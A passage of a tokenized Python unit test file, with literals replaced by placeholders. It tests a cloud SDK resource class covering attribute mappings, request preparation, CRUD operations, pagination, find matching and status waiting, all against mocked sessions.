assertFalse ( sot . allow_update ) <EOL> self . assertFalse ( sot . allow_delete ) <EOL> self . assertFalse ( sot . allow_list ) <EOL> self . assertFalse ( sot . allow_head ) <EOL> self . assertFalse ( sot . patch_update ) <EOL> def test_repr ( self ) : <EOL> a = { "<STR_LIT:a>" : <NUM_LIT:1> } <EOL> b = { "<STR_LIT:b>" : <NUM_LIT:2> } <EOL> c = { "<STR_LIT:c>" : <NUM_LIT:3> } <EOL> class Test ( resource2 . Resource ) : <EOL> def __init__ ( self ) : <EOL> self . _body = mock . Mock ( ) <EOL> self . _body . attributes . items = mock . Mock ( <EOL> return_value = a . items ( ) ) <EOL> self . _header = mock . Mock ( ) <EOL> self . _header . attributes . items = mock . Mock ( <EOL> return_value = b . items ( ) ) <EOL> self . _uri = mock . Mock ( ) <EOL> self . _uri . attributes . items = mock . Mock ( <EOL> return_value = c . items ( ) ) <EOL> the_repr = repr ( Test ( ) ) <EOL> self . assertIn ( "<STR_LIT>" , the_repr ) <EOL> self . assertIn ( "<STR_LIT>" , the_repr ) <EOL> self . assertIn ( "<STR_LIT>" , the_repr ) <EOL> self . assertIn ( "<STR_LIT>" , the_repr ) <EOL> def test__update ( self ) : <EOL> sot = resource2 . Resource ( ) <EOL> body = "<STR_LIT:body>" <EOL> header = "<STR_LIT>" <EOL> uri = "<STR_LIT>" <EOL> sot . _collect_attrs = mock . Mock ( return_value = ( body , header , uri ) ) <EOL> sot . _body . update = mock . Mock ( ) <EOL> sot . _header . update = mock . Mock ( ) <EOL> sot . _uri . update = mock . Mock ( ) <EOL> args = { "<STR_LIT>" : <NUM_LIT:1> } <EOL> sot . _update ( ** args ) <EOL> sot . _collect_attrs . assert_called_once_with ( args ) <EOL> sot . _body . update . assert_called_once_with ( body ) <EOL> sot . _header . update . assert_called_once_with ( header ) <EOL> sot . _uri . update . assert_called_once_with ( uri ) <EOL> def test__collect_attrs ( self ) : <EOL> sot = resource2 . Resource ( ) <EOL> expected_attrs = [ "<STR_LIT:body>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> sot . _consume_attrs = mock . Mock ( ) <EOL> sot . _consume_attrs . 
side_effect = expected_attrs <EOL> actual_attrs = sot . _collect_attrs ( dict ( ) ) <EOL> self . assertItemsEqual ( expected_attrs , actual_attrs ) <EOL> def test__consume_attrs ( self ) : <EOL> serverside_key1 = "<STR_LIT>" <EOL> clientside_key1 = "<STR_LIT>" <EOL> serverside_key2 = "<STR_LIT>" <EOL> clientside_key2 = "<STR_LIT>" <EOL> value1 = "<STR_LIT>" <EOL> value2 = "<STR_LIT>" <EOL> mapping = { clientside_key1 : serverside_key1 , <EOL> clientside_key2 : serverside_key2 } <EOL> other_key = "<STR_LIT>" <EOL> other_value = "<STR_LIT>" <EOL> attrs = { clientside_key1 : value1 , <EOL> serverside_key2 : value2 , <EOL> other_key : other_value } <EOL> sot = resource2 . Resource ( ) <EOL> result = sot . _consume_attrs ( mapping , attrs ) <EOL> self . assertDictEqual ( { other_key : other_value } , attrs ) <EOL> self . assertDictEqual ( { serverside_key1 : value1 , <EOL> serverside_key2 : value2 } , result ) <EOL> def test__mapping_defaults ( self ) : <EOL> self . assertIn ( "<STR_LIT:location>" , resource2 . Resource . _header_mapping ( ) ) <EOL> self . assertIn ( "<STR_LIT:name>" , resource2 . Resource . _body_mapping ( ) ) <EOL> self . assertIn ( "<STR_LIT:id>" , resource2 . Resource . _body_mapping ( ) ) <EOL> def test__mapping_overrides ( self ) : <EOL> new_name = "<STR_LIT>" <EOL> new_id = "<STR_LIT>" <EOL> class Test ( resource2 . Resource ) : <EOL> name = resource2 . Body ( new_name ) <EOL> id = resource2 . Body ( new_id ) <EOL> mapping = Test . _body_mapping ( ) <EOL> self . assertEqual ( new_name , mapping [ "<STR_LIT:name>" ] ) <EOL> self . assertEqual ( new_id , mapping [ "<STR_LIT:id>" ] ) <EOL> def test__body_mapping ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> x = resource2 . Body ( "<STR_LIT:x>" ) <EOL> y = resource2 . Body ( "<STR_LIT:y>" ) <EOL> z = resource2 . Body ( "<STR_LIT:z>" ) <EOL> self . assertIn ( "<STR_LIT:x>" , Test . _body_mapping ( ) ) <EOL> self . assertIn ( "<STR_LIT:y>" , Test . _body_mapping ( ) ) <EOL> self . 
assertIn ( "<STR_LIT:z>" , Test . _body_mapping ( ) ) <EOL> def test__header_mapping ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> x = resource2 . Header ( "<STR_LIT:x>" ) <EOL> y = resource2 . Header ( "<STR_LIT:y>" ) <EOL> z = resource2 . Header ( "<STR_LIT:z>" ) <EOL> self . assertIn ( "<STR_LIT:x>" , Test . _header_mapping ( ) ) <EOL> self . assertIn ( "<STR_LIT:y>" , Test . _header_mapping ( ) ) <EOL> self . assertIn ( "<STR_LIT:z>" , Test . _header_mapping ( ) ) <EOL> def test__uri_mapping ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> x = resource2 . URI ( "<STR_LIT:x>" ) <EOL> y = resource2 . URI ( "<STR_LIT:y>" ) <EOL> z = resource2 . URI ( "<STR_LIT:z>" ) <EOL> self . assertIn ( "<STR_LIT:x>" , Test . _uri_mapping ( ) ) <EOL> self . assertIn ( "<STR_LIT:y>" , Test . _uri_mapping ( ) ) <EOL> self . assertIn ( "<STR_LIT:z>" , Test . _uri_mapping ( ) ) <EOL> def test__alternate_id_None ( self ) : <EOL> self . assertEqual ( "<STR_LIT>" , resource2 . Resource . _alternate_id ( ) ) <EOL> def test__alternate_id ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> alt = resource2 . Body ( "<STR_LIT>" , alternate_id = True ) <EOL> self . assertTrue ( "<STR_LIT>" , Test . _alternate_id ( ) ) <EOL> def test__get_id_instance ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> id = resource2 . Body ( "<STR_LIT:id>" ) <EOL> value = "<STR_LIT:id>" <EOL> sot = Test ( id = value ) <EOL> self . assertEqual ( value , sot . _get_id ( sot ) ) <EOL> def test__get_id_instance_alternate ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> attr = resource2 . Body ( "<STR_LIT>" , alternate_id = True ) <EOL> value = "<STR_LIT:id>" <EOL> sot = Test ( attr = value ) <EOL> self . assertEqual ( value , sot . _get_id ( sot ) ) <EOL> def test__get_id_value ( self ) : <EOL> value = "<STR_LIT:id>" <EOL> self . assertEqual ( value , resource2 . Resource . _get_id ( value ) ) <EOL> def test_new ( self ) : <EOL> class Test ( resource2 . 
Resource ) : <EOL> attr = resource2 . Body ( "<STR_LIT>" ) <EOL> value = "<STR_LIT:value>" <EOL> sot = Test . new ( attr = value ) <EOL> self . assertIn ( "<STR_LIT>" , sot . _body . dirty ) <EOL> self . assertEqual ( value , sot . attr ) <EOL> def test_existing ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> attr = resource2 . Body ( "<STR_LIT>" ) <EOL> value = "<STR_LIT:value>" <EOL> sot = Test . existing ( attr = value ) <EOL> self . assertNotIn ( "<STR_LIT>" , sot . _body . dirty ) <EOL> self . assertEqual ( value , sot . attr ) <EOL> def test__prepare_request_with_id ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> base_path = "<STR_LIT>" <EOL> body_attr = resource2 . Body ( "<STR_LIT:x>" ) <EOL> header_attr = resource2 . Header ( "<STR_LIT:y>" ) <EOL> the_id = "<STR_LIT:id>" <EOL> body_value = "<STR_LIT:body>" <EOL> header_value = "<STR_LIT>" <EOL> sot = Test ( id = the_id , body_attr = body_value , header_attr = header_value , <EOL> synchronized = False ) <EOL> result = sot . _prepare_request ( requires_id = True ) <EOL> self . assertEqual ( "<STR_LIT>" , result . uri ) <EOL> self . assertEqual ( { "<STR_LIT:x>" : body_value , "<STR_LIT:id>" : the_id } , result . body ) <EOL> self . assertEqual ( { "<STR_LIT:y>" : header_value } , result . headers ) <EOL> def test__prepare_request_missing_id ( self ) : <EOL> sot = resource2 . Resource ( id = None ) <EOL> self . assertRaises ( exceptions . InvalidRequest , <EOL> sot . _prepare_request , requires_id = True ) <EOL> def test__prepare_request_with_key ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> class Test ( resource2 . Resource ) : <EOL> base_path = "<STR_LIT>" <EOL> resource_key = key <EOL> body_attr = resource2 . Body ( "<STR_LIT:x>" ) <EOL> header_attr = resource2 . Header ( "<STR_LIT:y>" ) <EOL> body_value = "<STR_LIT:body>" <EOL> header_value = "<STR_LIT>" <EOL> sot = Test ( body_attr = body_value , header_attr = header_value , <EOL> synchronized = False ) <EOL> result = sot . 
_prepare_request ( requires_id = False , prepend_key = True ) <EOL> self . assertEqual ( "<STR_LIT>" , result . uri ) <EOL> self . assertEqual ( { key : { "<STR_LIT:x>" : body_value } } , result . body ) <EOL> self . assertEqual ( { "<STR_LIT:y>" : header_value } , result . headers ) <EOL> def test__transpose_component ( self ) : <EOL> client_name = "<STR_LIT>" <EOL> server_name = "<STR_LIT>" <EOL> value = "<STR_LIT:value>" <EOL> mapping = { client_name : server_name , "<STR_LIT>" : "<STR_LIT>" } <EOL> component = { server_name : value } <EOL> sot = resource2 . Resource ( ) <EOL> result = sot . _transpose_component ( component , mapping ) <EOL> self . assertEqual ( { client_name : value } , result ) <EOL> def test__translate_response_no_body ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> attr = resource2 . Header ( "<STR_LIT>" ) <EOL> response = mock . Mock ( ) <EOL> response . headers = dict ( ) <EOL> sot = Test ( ) <EOL> sot . _transpose_component = mock . Mock ( return_value = { "<STR_LIT>" : "<STR_LIT:value>" } ) <EOL> sot . _translate_response ( response , has_body = False ) <EOL> self . assertEqual ( dict ( ) , sot . _header . dirty ) <EOL> self . assertEqual ( "<STR_LIT:value>" , sot . attr ) <EOL> def test__translate_response_with_body_no_resource_key ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> attr = resource2 . Body ( "<STR_LIT>" ) <EOL> body = { "<STR_LIT>" : "<STR_LIT:value>" } <EOL> response = mock . Mock ( ) <EOL> response . headers = dict ( ) <EOL> response . json . return_value = body <EOL> sot = Test ( ) <EOL> sot . _transpose_component = mock . Mock ( side_effect = [ body , dict ( ) ] ) <EOL> sot . _translate_response ( response , has_body = True ) <EOL> self . assertEqual ( "<STR_LIT:value>" , sot . attr ) <EOL> self . assertEqual ( dict ( ) , sot . _body . dirty ) <EOL> self . assertEqual ( dict ( ) , sot . _header . 
dirty ) <EOL> def test__translate_response_with_body_with_resource_key ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> class Test ( resource2 . Resource ) : <EOL> resource_key = key <EOL> attr = resource2 . Body ( "<STR_LIT>" ) <EOL> body = { "<STR_LIT>" : "<STR_LIT:value>" } <EOL> response = mock . Mock ( ) <EOL> response . headers = dict ( ) <EOL> response . json . return_value = { key : body } <EOL> sot = Test ( ) <EOL> sot . _transpose_component = mock . Mock ( side_effect = [ body , dict ( ) ] ) <EOL> sot . _translate_response ( response , has_body = True ) <EOL> self . assertEqual ( "<STR_LIT:value>" , sot . attr ) <EOL> self . assertEqual ( dict ( ) , sot . _body . dirty ) <EOL> self . assertEqual ( dict ( ) , sot . _header . dirty ) <EOL> def test_cant_do_anything ( self ) : <EOL> class Test ( resource2 . Resource ) : <EOL> allow_create = False <EOL> allow_get = False <EOL> allow_update = False <EOL> allow_delete = False <EOL> allow_head = False <EOL> allow_list = False <EOL> sot = Test ( ) <EOL> self . assertRaises ( exceptions . MethodNotSupported , sot . create , "<STR_LIT>" ) <EOL> self . assertRaises ( exceptions . MethodNotSupported , sot . get , "<STR_LIT>" ) <EOL> self . assertRaises ( exceptions . MethodNotSupported , sot . delete , "<STR_LIT>" ) <EOL> self . assertRaises ( exceptions . MethodNotSupported , sot . head , "<STR_LIT>" ) <EOL> the_list = sot . list ( "<STR_LIT>" ) <EOL> self . assertRaises ( exceptions . MethodNotSupported , next , the_list ) <EOL> sot . _body = mock . Mock ( ) <EOL> sot . _body . dirty = mock . Mock ( return_value = { "<STR_LIT:x>" : "<STR_LIT:y>" } ) <EOL> self . assertRaises ( exceptions . MethodNotSupported , sot . update , "<STR_LIT>" ) <EOL> class TestResourceActions ( base . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestResourceActions , self ) . setUp ( ) <EOL> self . service_name = "<STR_LIT>" <EOL> self . base_path = "<STR_LIT>" <EOL> class Test ( resource2 . Resource ) : <EOL> service = self . 
service_name <EOL> base_path = self . base_path <EOL> allow_create = True <EOL> allow_get = True <EOL> allow_head = True <EOL> allow_update = True <EOL> allow_delete = True <EOL> allow_list = True <EOL> self . test_class = Test <EOL> self . request = mock . Mock ( spec = resource2 . _Request ) <EOL> self . request . uri = "<STR_LIT>" <EOL> self . request . body = "<STR_LIT:body>" <EOL> self . request . headers = "<STR_LIT>" <EOL> self . response = mock . Mock ( ) <EOL> self . sot = Test ( id = "<STR_LIT:id>" ) <EOL> self . sot . _prepare_request = mock . Mock ( return_value = self . request ) <EOL> self . sot . _translate_response = mock . Mock ( ) <EOL> self . session = mock . Mock ( spec = session . Session ) <EOL> self . session . create = mock . Mock ( return_value = self . response ) <EOL> self . session . get = mock . Mock ( return_value = self . response ) <EOL> self . session . put = mock . Mock ( return_value = self . response ) <EOL> self . session . patch = mock . Mock ( return_value = self . response ) <EOL> self . session . post = mock . Mock ( return_value = self . response ) <EOL> self . session . delete = mock . Mock ( return_value = self . response ) <EOL> self . session . head = mock . Mock ( return_value = self . response ) <EOL> def _test_create ( self , requires_id = False , prepend_key = False ) : <EOL> if not requires_id : <EOL> self . sot . id = None <EOL> result = self . sot . create ( self . session ) <EOL> self . sot . _prepare_request . assert_called_once_with ( <EOL> requires_id = requires_id , prepend_key = prepend_key ) <EOL> if requires_id : <EOL> self . session . put . assert_called_once_with ( <EOL> self . request . uri , <EOL> endpoint_filter = self . service_name , <EOL> json = self . request . body , headers = self . request . headers ) <EOL> else : <EOL> self . session . post . assert_called_once_with ( <EOL> self . request . uri , <EOL> endpoint_filter = self . service_name , <EOL> json = self . request . 
body , headers = self . request . headers ) <EOL> self . sot . _translate_response . assert_called_once_with ( self . response ) <EOL> self . assertEqual ( result , self . sot ) <EOL> def test_create_with_id ( self ) : <EOL> self . _test_create ( requires_id = True , prepend_key = True ) <EOL> def test_create_without_id ( self ) : <EOL> self . _test_create ( requires_id = False , prepend_key = True ) <EOL> def test_get ( self ) : <EOL> result = self . sot . get ( self . session ) <EOL> self . sot . _prepare_request . assert_called_once_with ( ) <EOL> self . session . get . assert_called_once_with ( <EOL> self . request . uri , <EOL> endpoint_filter = self . service_name ) <EOL> self . sot . _translate_response . assert_called_once_with ( self . response ) <EOL> self . assertEqual ( result , self . sot ) <EOL> def test_head ( self ) : <EOL> result = self . sot . head ( self . session ) <EOL> self . sot . _prepare_request . assert_called_once_with ( ) <EOL> self . session . head . assert_called_once_with ( <EOL> self . request . uri , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . sot . _translate_response . assert_called_once_with ( self . response ) <EOL> self . assertEqual ( result , self . sot ) <EOL> def _test_update ( self , patch_update = False ) : <EOL> self . sot . patch_update = patch_update <EOL> self . sot . _body = mock . Mock ( ) <EOL> self . sot . _body . dirty = mock . Mock ( return_value = { "<STR_LIT:x>" : "<STR_LIT:y>" } ) <EOL> result = self . sot . update ( self . session ) <EOL> self . sot . _prepare_request . assert_called_once_with ( prepend_key = True ) <EOL> if patch_update : <EOL> self . session . patch . assert_called_once_with ( <EOL> self . request . uri , <EOL> endpoint_filter = self . service_name , <EOL> json = self . request . body , headers = self . request . headers ) <EOL> else : <EOL> self . session . put . assert_called_once_with ( <EOL> self . request . 
uri , <EOL> endpoint_filter = self . service_name , <EOL> json = self . request . body , headers = self . request . headers ) <EOL> self . sot . _translate_response . assert_called_once_with ( self . response ) <EOL> self . assertEqual ( result , self . sot ) <EOL> def test_update_put ( self ) : <EOL> self . _test_update ( patch_update = False ) <EOL> def test_update_patch ( self ) : <EOL> self . _test_update ( patch_update = True ) <EOL> def test_update_not_dirty ( self ) : <EOL> self . sot . _body = mock . Mock ( ) <EOL> self . sot . _body . dirty = dict ( ) <EOL> self . sot . _header = mock . Mock ( ) <EOL> self . sot . _header . dirty = dict ( ) <EOL> result = self . sot . update ( self . session ) <EOL> self . assertEqual ( result , self . sot ) <EOL> self . session . put . assert_not_called ( ) <EOL> def test_delete ( self ) : <EOL> result = self . sot . delete ( self . session ) <EOL> self . sot . _prepare_request . assert_called_once_with ( ) <EOL> self . session . delete . assert_called_once_with ( <EOL> self . request . uri , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . sot . _translate_response . assert_called_once_with ( <EOL> self . response , has_body = False ) <EOL> self . assertEqual ( result , self . sot ) <EOL> def test_list_empty_response ( self ) : <EOL> mock_response = mock . Mock ( ) <EOL> mock_response . json . return_value = [ ] <EOL> self . session . get . return_value = mock_response <EOL> result = list ( self . sot . list ( self . session ) ) <EOL> self . session . get . assert_called_once_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { } ) <EOL> self . assertEqual ( [ ] , result ) <EOL> def test_list_one_page_response_paginated ( self ) : <EOL> id_value = <NUM_LIT:1> <EOL> mock_response = mock . Mock ( ) <EOL> mock_response . json . 
side_effect = [ [ { "<STR_LIT:id>" : id_value } ] , <EOL> [ ] ] <EOL> self . session . get . return_value = mock_response <EOL> results = list ( self . sot . list ( self . session , paginated = True ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( results ) ) <EOL> self . session . get . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ "<STR_LIT>" ] = { } <EOL> self . session . get . call_args_list [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] [ "<STR_LIT>" ] = { "<STR_LIT>" : id_value } <EOL> self . assertEqual ( id_value , results [ <NUM_LIT:0> ] . id ) <EOL> self . assertIsInstance ( results [ <NUM_LIT:0> ] , self . test_class ) <EOL> def test_list_one_page_response_not_paginated ( self ) : <EOL> id_value = <NUM_LIT:1> <EOL> mock_response = mock . Mock ( ) <EOL> mock_response . json . return_value = [ { "<STR_LIT:id>" : id_value } ] <EOL> self . session . get . return_value = mock_response <EOL> results = list ( self . sot . list ( self . session , paginated = False ) ) <EOL> self . session . get . assert_called_once_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { } ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( results ) ) <EOL> self . assertEqual ( id_value , results [ <NUM_LIT:0> ] . id ) <EOL> self . assertIsInstance ( results [ <NUM_LIT:0> ] , self . test_class ) <EOL> def test_list_one_page_response_resources_key ( self ) : <EOL> key = "<STR_LIT>" <EOL> class Test ( self . test_class ) : <EOL> resources_key = key <EOL> id_value = <NUM_LIT:1> <EOL> mock_response = mock . Mock ( ) <EOL> mock_response . json . return_value = { key : [ { "<STR_LIT:id>" : id_value } ] } <EOL> self . session . get . return_value = mock_response <EOL> sot = Test ( ) <EOL> results = list ( sot . list ( self . session ) ) <EOL> self . session . get . assert_called_once_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . 
service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { } ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( results ) ) <EOL> self . assertEqual ( id_value , results [ <NUM_LIT:0> ] . id ) <EOL> self . assertIsInstance ( results [ <NUM_LIT:0> ] , self . test_class ) <EOL> def test_list_multi_page_response_not_paginated ( self ) : <EOL> ids = [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> mock_response = mock . Mock ( ) <EOL> mock_response . json . side_effect = [ [ { "<STR_LIT:id>" : ids [ <NUM_LIT:0> ] } ] , <EOL> [ { "<STR_LIT:id>" : ids [ <NUM_LIT:1> ] } ] ] <EOL> self . session . get . return_value = mock_response <EOL> results = list ( self . sot . list ( self . session , paginated = False ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( results ) ) <EOL> self . assertEqual ( ids [ <NUM_LIT:0> ] , results [ <NUM_LIT:0> ] . id ) <EOL> self . assertIsInstance ( results [ <NUM_LIT:0> ] , self . test_class ) <EOL> def test_list_query_params ( self ) : <EOL> id = <NUM_LIT:1> <EOL> qp = "<STR_LIT>" <EOL> qp_name = "<STR_LIT>" <EOL> uri_param = "<STR_LIT>" <EOL> mock_response = mock . Mock ( ) <EOL> mock_response . json . side_effect = [ [ { "<STR_LIT:id>" : id } ] , <EOL> [ ] ] <EOL> self . session . get . return_value = mock_response <EOL> class Test ( self . test_class ) : <EOL> _query_mapping = resource2 . QueryParameters ( query_param = qp_name ) <EOL> base_path = "<STR_LIT>" <EOL> something = resource2 . URI ( "<STR_LIT>" ) <EOL> results = list ( Test . list ( self . session , paginated = True , <EOL> query_param = qp , something = uri_param ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( results ) ) <EOL> self . session . get . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ "<STR_LIT>" ] = { qp_name : qp } <EOL> self . assertEqual ( self . session . get . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , <EOL> Test . 
base_path % { "<STR_LIT>" : uri_param } ) <EOL> def test_list_multi_page_response_paginated ( self ) : <EOL> ids = [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> resp1 = mock . Mock ( ) <EOL> resp1 . json . return_value = [ { "<STR_LIT:id>" : ids [ <NUM_LIT:0> ] } ] <EOL> resp2 = mock . Mock ( ) <EOL> resp2 . json . return_value = [ { "<STR_LIT:id>" : ids [ <NUM_LIT:1> ] } ] <EOL> resp3 = mock . Mock ( ) <EOL> resp3 . json . return_value = [ ] <EOL> self . session . get . side_effect = [ resp1 , resp2 , resp3 ] <EOL> results = self . sot . list ( self . session , paginated = True ) <EOL> result0 = next ( results ) <EOL> self . assertEqual ( result0 . id , ids [ <NUM_LIT:0> ] ) <EOL> self . session . get . assert_called_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { } ) <EOL> result1 = next ( results ) <EOL> self . assertEqual ( result1 . id , ids [ <NUM_LIT:1> ] ) <EOL> self . session . get . assert_called_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:1> } ) <EOL> self . assertRaises ( StopIteration , next , results ) <EOL> self . session . get . assert_called_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:2> } ) <EOL> def test_list_multi_page_early_termination ( self ) : <EOL> ids = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> resp1 = mock . Mock ( ) <EOL> resp1 . json . return_value = [ { "<STR_LIT:id>" : ids [ <NUM_LIT:0> ] } , { "<STR_LIT:id>" : ids [ <NUM_LIT:1> ] } ] <EOL> resp2 = mock . Mock ( ) <EOL> resp2 . json . return_value = [ { "<STR_LIT:id>" : ids [ <NUM_LIT:2> ] } ] <EOL> self . session . get . 
side_effect = [ resp1 , resp2 ] <EOL> results = self . sot . list ( self . session , paginated = True ) <EOL> result0 = next ( results ) <EOL> self . assertEqual ( result0 . id , ids [ <NUM_LIT:0> ] ) <EOL> result1 = next ( results ) <EOL> self . assertEqual ( result1 . id , ids [ <NUM_LIT:1> ] ) <EOL> self . session . get . assert_called_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { } ) <EOL> result2 = next ( results ) <EOL> self . assertEqual ( result2 . id , ids [ <NUM_LIT:2> ] ) <EOL> self . session . get . assert_called_with ( <EOL> self . base_path , <EOL> endpoint_filter = self . service_name , <EOL> headers = { "<STR_LIT>" : "<STR_LIT:application/json>" } , <EOL> params = { "<STR_LIT>" : <NUM_LIT:2> , "<STR_LIT>" : <NUM_LIT:2> } ) <EOL> self . assertRaises ( StopIteration , next , results ) <EOL> self . assertEqual ( <NUM_LIT:2> , len ( self . session . get . call_args_list ) ) <EOL> class TestResourceFind ( base . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestResourceFind , self ) . setUp ( ) <EOL> self . result = <NUM_LIT:1> <EOL> class Base ( resource2 . Resource ) : <EOL> @ classmethod <EOL> def existing ( cls , ** kwargs ) : <EOL> raise exceptions . NotFoundException <EOL> @ classmethod <EOL> def list ( cls , session ) : <EOL> return None <EOL> class OneResult ( Base ) : <EOL> @ classmethod <EOL> def _get_one_match ( cls , * args ) : <EOL> return self . result <EOL> class NoResults ( Base ) : <EOL> @ classmethod <EOL> def _get_one_match ( cls , * args ) : <EOL> return None <EOL> self . no_results = NoResults <EOL> self . one_result = OneResult <EOL> def test_find_short_circuit ( self ) : <EOL> value = <NUM_LIT:1> <EOL> class Test ( resource2 . Resource ) : <EOL> @ classmethod <EOL> def existing ( cls , ** kwargs ) : <EOL> mock_match = mock . Mock ( ) <EOL> mock_match . get . 
return_value = value <EOL> return mock_match <EOL> result = Test . find ( "<STR_LIT>" , "<STR_LIT:name>" ) <EOL> self . assertEqual ( result , value ) <EOL> def test_no_match_raise ( self ) : <EOL> self . assertRaises ( exceptions . ResourceNotFound , self . no_results . find , <EOL> "<STR_LIT>" , "<STR_LIT:name>" , ignore_missing = False ) <EOL> def test_no_match_return ( self ) : <EOL> self . assertIsNone ( <EOL> self . no_results . find ( "<STR_LIT>" , "<STR_LIT:name>" , ignore_missing = True ) ) <EOL> def test_find_result ( self ) : <EOL> self . assertEqual ( self . result , self . one_result . find ( "<STR_LIT>" , "<STR_LIT:name>" ) ) <EOL> def test_match_empty_results ( self ) : <EOL> self . assertIsNone ( resource2 . Resource . _get_one_match ( "<STR_LIT:name>" , [ ] ) ) <EOL> def test_no_match_by_name ( self ) : <EOL> the_name = "<STR_LIT>" <EOL> match = mock . Mock ( spec = resource2 . Resource ) <EOL> match . name = the_name <EOL> result = resource2 . Resource . _get_one_match ( "<STR_LIT>" , [ match ] ) <EOL> self . assertIsNone ( result , match ) <EOL> def test_single_match_by_name ( self ) : <EOL> the_name = "<STR_LIT>" <EOL> match = mock . Mock ( spec = resource2 . Resource ) <EOL> match . name = the_name <EOL> result = resource2 . Resource . _get_one_match ( the_name , [ match ] ) <EOL> self . assertIs ( result , match ) <EOL> def test_single_match_by_id ( self ) : <EOL> the_id = "<STR_LIT>" <EOL> match = mock . Mock ( spec = resource2 . Resource ) <EOL> match . id = the_id <EOL> result = resource2 . Resource . _get_one_match ( the_id , [ match ] ) <EOL> self . assertIs ( result , match ) <EOL> def test_single_match_by_alternate_id ( self ) : <EOL> the_id = "<STR_LIT>" <EOL> class Test ( resource2 . Resource ) : <EOL> other_id = resource2 . Body ( "<STR_LIT>" , alternate_id = True ) <EOL> match = Test ( other_id = the_id ) <EOL> result = Test . _get_one_match ( the_id , [ match ] ) <EOL> self . 
assertIs ( result , match ) <EOL> def test_multiple_matches ( self ) : <EOL> the_id = "<STR_LIT>" <EOL> match = mock . Mock ( spec = resource2 . Resource ) <EOL> match . id = the_id <EOL> self . assertRaises ( <EOL> exceptions . DuplicateResource , <EOL> resource2 . Resource . _get_one_match , the_id , [ match , match ] ) <EOL> class TestWaitForStatus ( base . TestCase ) : <EOL> def test_immediate_status ( self ) : <EOL> status = "<STR_LIT>" <EOL> resource = mock . Mock ( ) <EOL> resource . status = status <EOL> result = resource2 . wait_for_status ( "<STR_LIT>" , resource , status , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( result , resource ) <EOL> @ mock . patch ( "<STR_LIT>" , return_value = None ) <EOL> def test_status_match ( self , mock_sleep ) : <EOL> status = "<STR_LIT>" <EOL> resource = mock . Mock ( ) <EOL> statuses = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , status ] <EOL> type ( resource ) . status = mock . PropertyMock ( side_effect = statuses ) <EOL> result = resource2 . wait_for_status ( "<STR_LIT>" , resource , status , <EOL> None , <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> self . assertEqual ( result , resource ) <EOL> @ mock . patch ( "<STR_LIT>" , return_value = None ) <EOL> def test_status_fails ( self , mock_sleep ) : <EOL> status = "<STR_LIT>" <EOL> failure = "<STR_LIT>" <EOL> resource = mock . Mock ( ) <EOL> statuses = [ "<STR_LIT>" , failure , failure , failure ] <EOL> type ( resource ) . status = mock . PropertyMock ( side_effect = statuses ) <EOL> self . assertRaises ( exceptions . ResourceFailure , <EOL> resource2 . wait_for_status , <EOL> "<STR_LIT>" , resource , status , [ failure ] , <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> @ mock . patch ( "<STR_LIT>" , return_value = None ) <EOL> def test_timeout ( self , mock_sleep ) : <EOL> status = "<STR_LIT>" <EOL> resource = mock . Mock ( ) <EOL> statuses = [ "<STR_LIT>" ] * <NUM_LIT:7> <EOL> type ( resource ) . status = mock . 
